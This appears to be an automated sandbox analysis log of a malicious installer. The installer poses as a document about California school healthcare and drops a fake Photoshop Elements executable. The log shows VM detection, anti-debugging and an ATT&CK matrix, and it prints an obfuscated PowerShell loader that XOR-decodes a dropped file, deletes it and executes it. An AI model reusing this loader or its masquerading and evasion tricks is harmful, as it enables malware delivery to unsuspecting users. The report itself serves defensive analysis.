Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 5930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 5CD0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 5E50000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 5E70000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 5EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 9610000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 9660000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: 96B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A6D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A730000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A790000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A7B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A7D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A830000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A890000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A8B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A8D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: A8F0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: B9A0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: B9D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: B9F0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: BA10000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: BA30000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: BA50000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: BDC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C3D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C450000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C490000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C4B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C4D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C530000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: C5D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: CA30000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: CF00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: CA40000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: D0A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: D000000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: D080000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: D9E0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWindow / User API: threadDelayed 982
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe TID: 7428Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7684Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3758086632.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753899071.000001BD9DC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753812155.000001BD9DC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3757299939.000001BD9F25C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1319542587.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\/T
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765274666.00000000097AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNTD~1\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\content.htmlnt.html?sapCode=PSE&locale=en_US&isHighDpi=false&hideVersion=true&productName=Adobe Photoshop Elements 2024&productVersion=24.0&carouselType=GenericCarouselselFUcGo4
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: .Adobe.XD.Dev_adky2gkssdxteAdobe Experience Design CC (Prerelease) (No CC moniker)Adobe.CC.XD.Dev_adky2gkssdxteAdobe Experience Design CC (Prerelease)Adobe.CC.XD_adky2gkssdxteAdobe Experience Design CC (Beta)Adobe.XD.Prerelease_adky2gkssdxteAdobe.CC.XD.Prerelease_adky2gkssdxteAdobe.CSDK.SampleApp_adky2gkssdxteAdobeXD Acceptance Tests.Adobe.XD_adky2gkssdxteAdobe Experience Design CC (Beta) (No CC moniker)Adobe.Fresco.Prerelease_pc75e8sa7ep4eGemini PrereleaseAdobe.Fresco_pc75e8sa7ep4eGeminiAdobe.Fresco.Prerelease_mm324r2fpj8r0Gemini Dev PrereleaseAdobe.Fresco_mm324r2fpj8r0Gemini Dev7a1e375c-f7a3-4776-812a-eeb47e4b928c_enpm4xejd91ycNGLApp_REGemini_7cg12t602rmqcGeminiTestAppAdobe.XD.Dev_pc75e8sa7ep4eAdobe Experience Design (Dev)7a1e375c-f7a3-4776-812a-eeb47e4b928c_bjmg4ec3qaa5yNGLAppAdobe.XD_pc75e8sa7ep4eAdobe Experience DesignAdobe.XD.Prerelease_pc75e8sa7ep4eAdobe Experience Design (Prerelease)Adobe.XD.Beta_pc75e8sa7ep4eyyyy-MM-ddhh'-'mm'-'ss%s %s-%.3dAdobe Desktop CommonAdobeCommon FilesCEFx64com.adobe.ngl-IPV4ipVersionmacAddressipAddressnetworkInterfaceOSUtilSOFTWARE\Adobe\NGL\SyncAuthSOFTWARE\Policies\Adobe\NGL\AuthInfoSOFTWARE\Adobe\Identity\UserSpecificIdentitycom.adobe.ngl-nullROOT\CIMV2kernel32WindowsEnabledManufacturerHypervisorPresentWQLSELECT * FROM Win32_ComputerSystemXenVirtualBoxVMwareModelVirtualGoogleMicrosoftQEMUEC2UUIDSELECT * FROM Win32_ComputerSystemProductOpenStackIsWow64Process2%s: VM detection exception!!IsVirtualEnvironmentOSUtilsUnknownx86ARM64lFnIsWow64Process2 not available%s: x86 ARM emulation ProcessorId is calculatedGetProcessorIdPROCESSOR_REVISIONPROCESSOR_LEVELGetPathTillCommonFilesAdobe%ProgramW6432%\\.\PhysicalDrive0%s: Exception in ProcessorId generation%s: Exception while invoking GetKnownFolderPath%s: GetKnownFolderPath failed%s: Exception while expanding environment string%s: Expanding Environment String failed, error code: %luSetEmbeddedBrowserVersion: EmbeddedBrowserVersion: %sIE-8.0.0.0IE-CEF:%s: Could not get System32 pathSetEmbeddedBrowserVersionversion.dllSetEmbeddedBrowserVersion: Already fetched EmbeddedBrowserVersion: %s%s: GetFileVersionInfoSizeA failed with error code %luGetFileVersionInfoSizeA%s: Could not load Version.dll%s: Caught an exception while getting System32 pathVerQueryValueA\VarFileInfo\Translation%s: GetFileVersionInfoA failed with error code %luGetFileVersionInfoASetEmbeddedBrowserVersion: EmbeddedBrowserVersion: %s gLatestCEFWFVersion: %s%s: VerQueryValueA failed\StringFileInfo\%04X04B0\ProductVersion\StringFileInfo\%02X%02X%02X%02X\ProductVersionAES%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02xEncryptDataWithKey failed with: ChainingModeChainingModeCBCObjectLengthDecryptDataWithKeyDecryptDataWithKey failed with: %s : failed with error: %luEncryptDataWithKey64WINDOWS_%s: finished with status %lu, Registry read returned %luGetImsAuthInfoParamsFromDeviceunknown-machineRtlGetVersionntdll.dll32Ethernet adapter Local Area ConnectionEthernet adapter Ethernet
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeAPI call chain: ExitProcess graph end nodegraph_10-20024
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeAPI call chain: ExitProcess graph end nodegraph_15-1034
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0052142C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0052142C
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00B49970 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,10_2_00B49970
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_005311C5 mov eax, dword ptr fs:[00000030h]10_2_005311C5
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0053B2D6 mov eax, dword ptr fs:[00000030h]10_2_0053B2D6
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0053B31A mov eax, dword ptr fs:[00000030h]10_2_0053B31A
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0052142C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0052142C
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 15_2_00510AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00510AC3
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "c:\users\user~1\appdata\local\temp\is-35jo9.tmp\must-school-districts-in-california-offer-free-healthcare-for-employees.tmp" /sl5="$2042a,320672528,821248,c:\users\user\desktop\must-school-districts-in-california-offer-free-healthcare-for-employees.exe"
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iex([text.encoding]::utf8.getstring((({$f=[io.file]::readallbytes($args[0]);(rm $args[0]);return $f}.invoke('c:\users\user~1\appdata\local\temp\is-39dmu.tmp\..\26e22c944a289b4cdd81b4ea83e051ad.dat'))|%{$_ -bxor 'yxawmffazxzdohkgieqrlqjtojubnswc'[$k++%32]})))"
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "c:\users\user~1\appdata\local\temp\is-35jo9.tmp\must-school-districts-in-california-offer-free-healthcare-for-employees.tmp" /sl5="$2042a,320672528,821248,c:\users\user\desktop\must-school-districts-in-california-offer-free-healthcare-for-employees.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iex([text.encoding]::utf8.getstring((({$f=[io.file]::readallbytes($args[0]);(rm $args[0]);return $f}.invoke('c:\users\user~1\appdata\local\temp\is-39dmu.tmp\..\26e22c944a289b4cdd81b4ea83e051ad.dat'))|%{$_ -bxor 'yxawmffazxzdohkgieqrlqjtojubnswc'[$k++%32]})))"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: EnumSystemLocalesW,10_2_00541406
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_005418A5
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: EnumSystemLocalesW,10_2_005414A1
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,10_2_00541119
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_0054152C
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: EnumSystemLocalesW,10_2_005379D7
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,10_2_005419AB
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00541A7A
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,10_2_0054177F
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,10_2_00541314
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: GetLocaleInfoW,10_2_00537F90
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: EnumSystemLocalesW,10_2_005413BB
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CreativeCloud\ACC\AdobeDownload\HDInstaller.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CreativeCloud\ACC\AdobeDownload\HDInstaller.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CreativeCloud\ACC\AdobeDownload\HDInstaller.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Drive-by Compromise
21
Windows Management Instrumentation
1
Scripting
11
Process Injection
23
Masquerading
OS Credential Dumping1
Query Registry
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
5
Virtualization/Sandbox Evasion
LSASS Memory41
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)Logon Script (Windows)1
Modify Registry
Security Account Manager5
